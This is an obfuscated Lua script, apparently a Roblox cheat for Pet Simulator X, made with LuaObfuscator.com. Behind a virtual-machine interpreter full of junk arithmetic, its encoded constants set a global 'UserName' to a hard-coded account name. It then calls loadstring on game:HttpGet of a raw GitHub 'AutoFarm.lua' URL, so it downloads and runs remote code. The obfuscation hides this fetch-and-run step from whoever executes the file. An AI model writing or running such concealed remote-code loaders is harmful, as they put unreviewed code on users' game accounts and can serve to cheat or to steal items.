--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then local v66=0;while true do if (0==v66) then v18=v0(v3(v29,1,1));return "";end end else local v67=0;local v68;while true do if (v67==0) then v68=v2(v0(v29,16));if v18 then local v83=v5(v68,v18);v18=nil;return v83;else return v68;end break;end end end end);local function v19(v30,v31,v32)if v32 then local v69=(v30/((1149 -(634 + 513))^(v31-(370 -(361 + 8)))))%((2 + 0 + 0)^(((v32-((1619 -(320 + 1298)) + 0)) -(v31-(1 + 0))) + (1 -0)));return v69-(v69%1);else local v70=(1 + (2 -1))^(v31-(1 + 0));return (((v30%(v70 + v70))>=v70) and (1 + 0)) or (163 -(63 + 100));end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38=0 -0;local v39;local v40;while true do if (v38==(3 -2)) then return (v40 * (79 + 177)) + v39;end if (v38==(0 + 0)) then v39,v40=v1(v15,v17,v17 + (141 -(25 + (378 -264))));v17=v17 + (809 -(61 + 746));v38=933 -(108 + 824);end end end local function v22()local v41,v42,v43,v44=v1(v15,v17,v17 + (3 -0));v17=v17 + 4;return (v44 * (16778242 -(876 + 150))) + (v43 * 65536) + (v42 * (231 + 25)) + v41;end local function v23()local v45=0 + 0;local v46;local v47;while true do if (v45==(652 -(63 + 530 + 58))) then return (( -(8 -6) * v19(v47,1070 -(93 + 945))) + (559 -(284 + 274))) * ((1 + 1)^(v19(v47,21,(42 + 1037) -(338 + 710)) -1023)) * ((((v19(v47,1903 -(1332 + 570),672 -(370 + 282)) * ((1 + 1)^32)) + v46)/((1589 -(1379 + 208))^((119 -78) + 11))) + 1 + 0);end if (v45==(0 -0)) then v46=v22();v47=v22();v45=1;end end end local function v24(v33)local v48;if  not v33 then local v71=0 -(0 + 0);while true do if (v71==0) then v33=v22();if (v33==(1372 -(52 + 1320))) then return "";end break;end end end v48=v3(v15,v17,(v17 + v33) -((3 -2) + 0));v17=v17 + v33;local v49={};for v64=1, #v48 do v49[v64]=v2(v1(v3(v48,v64,v64)));end return v6(v49);end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v50=484 -(55 + 429);local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v50~=3) then else v57=nil;v58=nil;v50=1313 -(1179 + 130);end if (v50==0) then v51=0;v52=nil;v50=1;end if (v50==(3 + 1)) then v59=nil;while true do if ((384 -(24 + 360))==v51) then v52=0;v53=nil;v51=1;end if (v51~=(3 + 1)) then else while true do if (v52==2) then local v84=0 -0;local v85;while true do if (v84==(630 -(205 + 425))) then v85=0;while true do if (v85==(3 -2)) then v52=7 -4;break;end if (v85==(805 -(281 + 524))) then v57=nil;v58=nil;v85=1 -0;end end break;end end end if (v52==1) then v55=nil;v56=nil;v52=2;end if (v52~=(1060 -(781 + 276))) then else v59=nil;while true do local v88=0;local v89;while true do if (0~=v88) then else v89=0;while true do if (v89~=0) then else local v109=0;local v110;while true do if (v109~=(0 + 0)) then else v110=0;while true do if (v110==0) then local v116=0;while true do if (v116==0) then if (v53~=2) then else local v147=0;local v148;local v149;while true do if (v147==(23 -(4 + 18))) then while true do if (v148==(0 + 0)) then v149=0;while true do local v167=0 -0;local v168;while true do if (v167~=(1399 -(892 + 507))) then else v168=0 -0;while true do if (v168==(1214 -(1028 + 186))) then if (v149~=0) then else local v177=0;while true do if ((1 + 0)~=v177) then else v149=1 + 0;break;end if (v177==(0 + 0)) then local v179=0;while true do if (v179~=(873 -(420 + 452))) then else v177=2 -1;break;end if ((0 + 0)==v179) then for v182=729 -(67 + 661),v22() do local v183=0 + 0;local v184;local v185;while true do if (v183==1) then while true do if ((1476 -(827 + 649))~=v184) then else v185=v20();if (v19(v185,1,1)==0) then local v188=0 -0;local v189;local v190;local v191;local v192;local v193;while true do if (v188==1) then v191=nil;v192=nil;v188=2;end if (v188==0) then v189=0 -0;v190=nil;v188=1514 -(813 + 700);end if (v188~=2) then else v193=nil;while true do if (v189~=(0 + 0)) then else v190=0;v191=nil;v189=1 + 0;end if (1==v189) then local v194=1983 -(1478 + 505);while true do if (v194~=(2 -1)) then else v189=1 + 1;break;end if (v194~=(0 + 0)) then else v192=nil;v193=nil;v194=1;end end end if ((8 -6)==v189) then while true do if (v190~=2) then else local v195=0 -0;while true do if (v195==0) then if (v19(v192,28 -(9 + 18),1)==1) then v193[2]=v59[v193[1 + 1]];end if (v19(v192,1824 -(1760 + 62),1 + 1)==1) then v193[1173 -(1026 + 144)]=v59[v193[1946 -(908 + 1035)]];end v195=956 -(839 + 116);end if (v195==1) then v190=1743 -(1329 + 411);break;end end end if (v190==1) then local v196=0 + 0;while true do if (v196~=1) then else v190=2;break;end if (v196~=(0 -0)) then else v193={v21(),v21(),nil,nil};if (v191==0) then local v206=1611 -(430 + 1181);local v207;local v208;local v209;while true do if (v206==(0 -0)) then v207=0 -0;v208=nil;v206=1 + 0;end if ((2 -1)==v206) then v209=nil;while true do if (v207~=(1 + 0)) then else while true do if (v208~=0) then else v209=0;while true do if (v209~=0) then else v193[2 + 1]=v21();v193[2 + 2]=v21();break;end end break;end end break;end if (v207~=0) then else local v212=0;while true do if (v212==(1839 -(687 + 1152))) then v208=0;v209=nil;v212=1;end if (1==v212) then v207=1;break;end end end end break;end end elseif (v191==1) then v193[3]=v22();elseif (v191==2) then v193[3]=v22() -((1350 -(913 + 435))^(4 + 12));elseif (v191==3) then local v213=0 -0;while true do if ((389 -(144 + 245))==v213) then v193[2 + 1]=v22() -((5 -3)^(45 -29));v193[4]=v21();break;end end end v196=1;end end end if (v190==0) then local v197=0;while true do if (v197~=0) then else local v201=0 + 0;while true do if (v201==0) then v191=v19(v185,1198 -(864 + 332),3);v192=v19(v185,4,2 + 4);v201=1 -0;end if (v201==1) then v197=1;break;end end end if (v197==(82 -(42 + 39))) then v190=1;break;end end end if (v190~=3) then else if (v19(v192,14 -11,3)==1) then v193[1273 -(260 + 1009)]=v59[v193[4]];end v54[v182]=v193;break;end end break;end end break;end end end break;end end break;end if (v183==0) then v184=734 -(567 + 167);v185=nil;v183=4 -3;end end end for v186=3 -2,v22() do v55[v186-1]=v27();end v179=612 -(57 + 554);end end end end end if (v149==(79 -(10 + 68))) then local v178=0;while true do if (v178==0) then for v180=1 -0,v22() do v56[v180]=v22();end return v57;end end end break;end end break;end end end break;end end break;end if (v147~=0) then else v148=0 -0;v149=nil;v147=1;end end end if ((1628 -(750 + 878))==v53) then local v150=0 + 0;local v151;local v152;while true do if (v150==(0 + 0)) then v151=0 + 0;v152=nil;v150=1 + 0;end if (1==v150) then while true do if (v151==(0 + 0)) then v152=0 -0;while true do if (v152~=0) then else local v175=0;while true do if (v175==(0 -0)) then v54={};v55={};v175=3 -2;end if (v175==(558 -(224 + 333))) then v152=1;break;end end end if (v152~=(1418 -(343 + 1074))) then else local v176=0 + 0;while true do if (0~=v176) then else v56={};v57={v54,v55,nil,v56};v176=1;end if (1==v176) then v152=2 -0;break;end end end if ((723 -(469 + 252))==v152) then v53=1;break;end end break;end end break;end end end v116=1;end if ((1605 -(476 + 1128))~=v116) then else v110=1 + 0;break;end end end if (v110==(1224 -(320 + 903))) then v89=1;break;end end break;end end end if (v89==(2 -1)) then if (v53==1) then local v112=683 -(103 + 580);local v113;while true do if (v112==(0 + 0)) then v113=0 + 0;while true do if (v113~=(2 -1)) then else for v129=1,v58 do local v130=0;local v131;local v132;local v133;local v134;while true do if (v130~=(1 + 0)) then else v133=nil;v134=nil;v130=794 -(477 + 315);end if (2~=v130) then else while true do if (v131==1) then v134=nil;while true do if (v132==(1 + 0)) then if (v133==1) then v134=v20()~=0;elseif (v133==2) then v134=v23();elseif (v133==3) then v134=v24();end v59[v129]=v134;break;end if (v132==0) then local v170=0 + 0;while true do if ((0 + 0)==v170) then v133=v20();v134=nil;v170=1 -0;end if (v170==(1 + 0)) then v132=1;break;end end end end break;end if (v131==0) then v132=0 -0;v133=nil;v131=1 + 0;end end break;end if (0==v130) then v131=0 + 0;v132=nil;v130=1 + 0;end end end v57[3 + 0]=v20();v113=2;end if (v113~=2) then else v53=2;break;end if (v113==0) then v58=v22();v59={};v113=1;end end break;end end end break;end end break;end end end break;end if (0==v52) then local v86=0;local v87;while true do if (v86~=(0 + 0)) then else v87=0;while true do if (v87~=1) then else v52=1;break;end if (v87==0) then local v108=0;while true do if ((1 + 0)~=v108) then else v87=1;break;end if (v108~=(0 + 0)) then else v53=0;v54=nil;v108=1789 -(1243 + 545);end end end end break;end end end end break;end if (v51==2) then local v81=1709 -(1288 + 421);while true do if ((1294 -(199 + 1094))~=v81) then else v51=3 + 0;break;end if ((0 + 0)~=v81) then else v56=nil;v57=nil;v81=3 -2;end end end if ((589 -(585 + 1))~=v51) then else local v82=0;while true do if ((0 + 0)==v82) then v58=nil;v59=nil;v82=1;end if (v82~=(1 + 0)) then else v51=4;break;end end end if (v51~=(1 -0)) then else v54=nil;v55=nil;v51=2 + 0;end end break;end if (v50==(2 -1)) then v53=nil;v54=nil;v50=2;end if (v50~=2) then else v55=nil;v56=nil;v50=3;end end end local function v28(v34,v35,v36)local v60=0;local v61;local v62;local v63;while true do if (v60==1) then v63=v34[3];return function(...)local v75=0;local v76;local v77;local v78;local v79;local v80;while true do if (2==v75) then v80=nil;v80=function()local v90=v61;local v91=v62;local v92=v63;local v93=v26;local v94={};local v95={};local v96={};for v101=0 -0,v79 do if ((1909<=(3730 -(247 + 40))) and (v101>=v92)) then v94[v101-v92]=v78[v101 + 1 + 0];else v96[v101]=v78[v101 + 1];end end local v97=(v79-v92) + (485 -(267 + (615 -398)));local v98;local v99;while true do local v102=0;local v103;while true do if (((4970 -(233 + 317 + 555))<(719 + 3514)) and (v102==(0 + 0))) then v103=0;while true do if (((1701 -(187 + 723))==((954 -(41 + 131)) + 9)) and (v103==(0 -0))) then local v111=0;while true do if ((v111==(0 -0)) or ((453 -(2312 -(1154 + 806)))>=(313 + 3604))) then v98=v90[v76];v99=v98[1 -0];v111=1 + 0;end if ((778==((611 + 1344) -(131 + 1046))) and (1==v111)) then v103=(1271 + 222) -(1107 + 385);break;end end end if ((328==(137 + 191)) and (v103==(53 -(19 + 33)))) then if ((v99<=(11 -7)) or (((6940 -4802) + 101)>(2611 + 1791))) then if ((v99<=((5 -3) -(2 -1))) or ((143 -85)>(990 + 3338))) then if ((v99==((934 -(146 + 188)) -(165 + 435))) or ((8768 -6366)<=(1836 -(349 + 991)))) then v96[v98[2]]=v98[1096 -((1184 -(448 + 192)) + 549)];else do return;end end elseif ((3494>=(3993 -2962)) and (v99<=(2 + 0))) then local v119=56 -(22 + 34);local v120;local v121;local v122;while true do if ((v119==(722 -(637 + 53 + 31))) or ((4701 -((833 -(313 + 457)) + 325))==1338)) then v122=nil;while true do if (((3 -2)==v120) or ((5584 -(26 + 599))<=(5786 -(1216 + 410)))) then v96[v121 + 1 + 0]=v122;v96[v121]=v122[v98[1 + 3]];break;end if ((v120==(702 -(235 + 467))) or ((16838 -12053)<=(97 + (1148 -317)))) then local v159=0 + 0;local v160;while true do if (((1413 -(523 + 98))<=(1292 -(101 + 164))) and (v159==(0 -0))) then v160=0 + 0;while true do if ((v160==(1 -(0 + 0))) or ((3640 -2349)>(368 + 335 + 1917))) then v120=1 + 0 + 0;break;end if ((((824 -(248 + 124)) + 208)>(198 + 61)) and (v160==(0 + 0))) then v121=v98[1 + 1];v122=v96[v98[2 + (316 -(35 + 280))]];v160=1 -0;end end break;end end end end break;end if ((v119==0) or ((252 + 225 + 1070)>=2072)) then local v143=0 -0;while true do if (((3752 + 1228)>3956) and (v143==(588 -(371 + 217)))) then v120=816 -(449 + 367);v121=nil;v143=1;end if ((v143==1) or (353>(8263 -3322))) then v119=1 -(784 -(48 + 736));break;end end end end elseif (((2298 -(419 + 523))<((7787 -3608) + 95 + 0)) and (v99>(4 -(344 -(79 + 264))))) then if (((3137 + 1792)==4929) and (v96[v98[2]]==v98[16 -12])) then v76=v76 + (2 -1);else v76=v98[9 -6];end else local v135=1802 -(1227 + 575);local v136;local v137;local v138;local v139;while true do if ((v135==(3 -2)) or ((2673 -(494 + 617))<=(2517 -1490))) then local v154=341 -((231 -63) + 173);while true do if (((3622 -1185)>=(2232 -(763 + 1086))) and (v154==(1371 -(484 + 887)))) then v77=(v138 + v136) -1;v139=0;v154=1;end if (((2542 -(786 + 23))>=(2567 -1885)) and (v154==((2265 -(74 + 704)) -(827 + 659)))) then v135=2 + 0 + 0;break;end end end if ((v135==(0 + 0 + 0)) or ((2389 -(1818 + 25))>=1095)) then local v155=0 + 0;while true do if (((966 -589)<=(2103 -772)) and (v155==(1368 -(609 + 759)))) then v136=v98[1 + 1];v137,v138=v93(v96[v136](v12(v96,v136 + 1 + 0,v98[2 + (1 -0)])));v155=1 -(537 -(29 + 508));end if ((((1582 + 316) -(73 + 330))<3826) and (v155==((1701 -(443 + 514)) -(328 + 415)))) then v135=1;break;end end end if ((3833<4911) and (v135==(6 -4))) then for v161=v136,v77 do local v162=0;local v163;while true do if (((0 + 0 + (0 -0))==v162) or ((959 + (7366 -5261))<(4022 -(727 + 390)))) then v163=0 -0;while true do if (((407 + 4557)==4964) and (v163==((0 -0) -0))) then v139=v139 + 1 + 0;v96[v161]=v137[v139];break;end end break;end end end break;end end end elseif ((v99<=(1054 -(97 + 418 + 532))) or (1509<=(1198 -(7 + 357)))) then if ((v99<=5) or ((5369 -(15 + 1338))<=(4390 -1696))) then local v123=0 + 0;local v124;local v125;while true do if (((1798 -(505 + 1292))==v123) or ((4896 -3569)>=(3561 -(236 + 627)))) then while true do if (((3575 + 333)>=(1822 -(1167 -(19 + 31)))) and (v124==(1254 -(256 + 998)))) then v125=v98[(1330 -(467 + 854)) -(6 + 1)];v96[v125]=v96[v125](v12(v96,v125 + (2 -1),v77));break;end end break;end if ((v123==(0 -0)) or ((3370 -(407 + (1593 -(5 + 90))))<=(1032 + 271))) then local v144=(0 + 0) -(0 + 0);while true do if ((((2342 -(581 + 203)) -(1538 + 20))==v144) or (2472>=(5068 -(605 + 1065)))) then v124=0 + (0 -0);v125=nil;v144=1870 -(1709 + 160);end if ((944<=(1079 + (1324 -913))) and (v144==(1 + 0))) then v123=3 -2;break;end end end end elseif (((4257 -1707)==(7216 -(4761 -(47 + 48)))) and (v99>(16 -10))) then for v145=v98[2 + 0 + 0],v98[(1656 -(1387 + 265)) -1] do v96[v145]=nil;end else v76=v98[1 + 2];end elseif ((v99<=8) or (4068==(3956 -1214))) then v96[v98[1 + (2 -1)]][v98[4 -1]]=v98[(2569 -(644 + 325)) -(344 + 1252)];elseif ((3650>(487 + (5417 -3567))) and (v99>(22 -13))) then v96[v98[2 + 0]]();else v96[v98[184 -(71 + 15 + 96)]]=v36[v98[1302 -((1432 -(1009 + 408)) + 1284)]];end v76=v76 + (893 -(195 + 527 + 170));break;end end break;end end end end;v75=3;end if (v75==3) then A,B=v26(v10(v80));if  not A[1] then local v100=v34[4][v76] or "?";error("Script error at ["   .. v100   .. "]:"   .. A[2]);else return v12(A,2,B);end break;end if (v75==1) then v78={...};v79=v11("#",...) -1;v75=2;end if (v75==0) then v76=1;v77= -1;v75=1;end end end;end if (v60==0) then v61=v34[1];v62=v34[2];v60=1;end end end return v28(v27(),{},v16)(...);end v14("LOL!083O00028O0003023O005F4703083O00557365724E616D65030D3O00444E5A2O594F55545542453037030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100153O00124O00014O0007000100013O0026043O0002000100010004063O0002000100122O000100013O00260400010005000100010004063O00050001001209000200023O003008000200030004001209000200053O001209000300063O00200200030003000700122O000500084O0003000300054O000500023O00022O000A0002000100010004063O001400010004063O000500010004063O001400010004063O000200012O00013O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v8(),...);end
